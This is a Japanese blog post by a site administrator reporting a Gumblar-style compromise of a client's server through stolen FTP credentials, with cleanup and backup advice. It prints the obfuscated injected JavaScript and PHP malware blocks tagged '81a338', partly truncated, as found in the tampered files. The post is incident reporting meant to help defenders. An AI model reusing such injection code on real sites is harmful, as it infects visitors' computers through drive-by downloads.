WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

EC 切抜き @PAGES 管理画面 アフィリエイト がら空きビジネス テーマ バイドゥー 伊藤虎太郎 ECサイト 山下 配布 アフィ匠 クラック 掲示板 クラウド変換 マイクロソフト ハート getElementByTagName 株式会社A-ブログレス ぼかし ドメイン 大西良幸 クロスアフィリエイト ヤフー wp-login.php トレンドキーワード SEO 自己アフィリ 画像 マルウエア 百度 株式会社ニュース バックアップ 人物 .htaccess ざくざく君 コピーボタン ツール Wordpress Content Slide トレンドアフィリエイト パズル サイト改ざん 表示 中山秀人 日本語入力変換ソフト プラグイン FireWorks 北川 雅嗣 Yahoo FTP PHP やしろひろたみ フォローマティック css BUYMA YouTube Maniax 2017 流出 Windows Tiger-Wing RSS document.all 切り抜き DTD 関根塾 土屋ひろし Internet Explorer 転売大園塾 アレックス WP 無料 改ざん スタイルシート インペリアルゴールド BBIZ Agency Business リンクシェイカー ソフト インフォトップ 個人情報流出 explorer postpost もざ ボタン 既得権益 html 与沢翼 副業術 加工 Adobe Firefox 滑らか 池田純矢 自動化 セキュリティ Extension Manager プロモーション ネットビジネス最後の楽園 wpXサーバー Thunderbird iphone PPC XHTML サンタ 81a338 office 賢威 スマホ 到達率 ビジネス ブロックポリシー 無料オファー グラデーション 大園麗花 株式会社WINGOOD 与沢翼×蝶乃舞 インターネットビジネススクール エディタ 自動 村上省吾 関根義光 ネットガレージ LinkShaker レタープレス Line Google Maps 自己アフィリエイト アンダーグラウンドメソッド アクセスアップ 株式会社バンザイ SyntaxHighlighter デスクトップ 不労所得の神 スクロール twitter 秀吉塾天下統一 放射線 詐欺組織 Cash on Wordpress レイアウト崩れ 短縮URLツール Windows 7 CGI tool HTML4.0 ロリポップ ブロック アクセス制限 Chrome アレックス式ネオせどりスクール クラウド入力機能 高速ゲーム 申請金ビジネス SKナレッジ アンダーグラウンドアフィリエイトクラブ ソース ブルートフォースアタック モザイク ヤフーショッピング android 伊藤 歩 ネットショップ Google Maps API ネットビジネス 登録禁止 短縮URL followmatic force puzzle 不正アクセス メルマガ配信システム テンプレート インターネットエクスプローラー タイガーウイング MT Login LockDown 音量アイコン IE エクスチェンジ ping クリックランキング RSS Includes Pages 特権ビジネス Baidu Newpost Catch 権利収入 レイアウト KMS認証 functions.php ブラウザ 蝶乃舞 ネオヒルズアカデミー 脆弱性 レンタルサーバー MasterCollection 背景 MovableTYpe ヤフオク 株式会社SRシステム 小笠原健一 ムーバブルタイプ バナー 球体 ライオンアフィリエイト ランキング SmoothScroll.js タスクバー 宮田麗花 量産 スカイプ 無断送信 改竄 wordpress 情報商材 せどり 比較 RMT 原田真 WEB 出店料 定型文 Ban Hammer エクスプローラー High Concept Marketing ツイッター 個人情報 秒速で1億円稼ぐ男 固定ページ 不正送信 管理ツール 大園転売塾 ブラクラ 株式会社Free Agent Style 久積篤史 ライン 上位表示 感染 ping送信 シャンプー アドセンス 三橋美仁 詐欺 ワードプレス 伊藤 虎太郎 DOCTYPE プロファイル やしろ塾 ライブチャット 特定のメールアドレス ウイルス エキスパートメール ウインドウ IP マニュアル ネットゲーム system 加藤 秀吉 新井浩 トラフィック カスタマイズ getElementById KMSpico ネットビジネス大全集 レビュー 伊藤塾 株式会社SRシステム moza アイコン IBS Youtube Favicon google 立体 JavaScript ユーチューブマニアクス2017 ファビコン 大園式転売塾 石井匠 CS5 メモ CS6 ソースコード バイマ 高額塾 復元 優先順位 Diamond Affiliate Masters Program スムーズ インターネット フレンドシップメール ブラシ

アーカイブ

エステトラブル

このページの先頭へ